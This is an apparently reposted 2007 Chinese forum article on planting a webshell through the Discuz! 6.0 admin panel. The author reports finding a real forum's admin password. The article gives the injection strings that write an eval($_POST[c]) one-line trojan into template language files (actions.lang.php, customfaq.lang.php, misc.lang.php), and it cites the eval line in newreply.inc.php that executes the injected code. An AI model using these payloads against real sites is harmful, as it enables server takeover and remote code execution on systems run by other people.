查看文章 |
Discuz!_6.0后台拿shell
2007-08-05 19:32
今日见到一个论坛是 Discuz!_6.0.0RC1_SC_GBK 无意发现管理员管理密码. 进入后台后不能像5.5那样拿shell了.. 但看了一下源码. 发现提交 templates/default/actions.lang.php(以这个为例) 在最底那提交 游客\');?> 便能写入一句话木马并正常执行.
注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。 如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) 1.后台编辑customfaq(customfaq.lang.php文件) 在<?的后面加上 复制内容到剪贴板 代码: eval($_POST[c]); 2.后台编辑misc(misc.lang.php文件) 把post_reply_quote对应的内容改为 复制内容到剪贴板 代码: ";eval($_POST[c]);" 在前台回帖处选择引用回复。 简单看下代码: include/newreply.inc.php 107行: 复制内容到剪贴板 代码: eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";"); 呵呵,一个天然的后门:) PS:还有几个编辑模板的地方可以利用,和第二种方法类似。 |
最近读者:
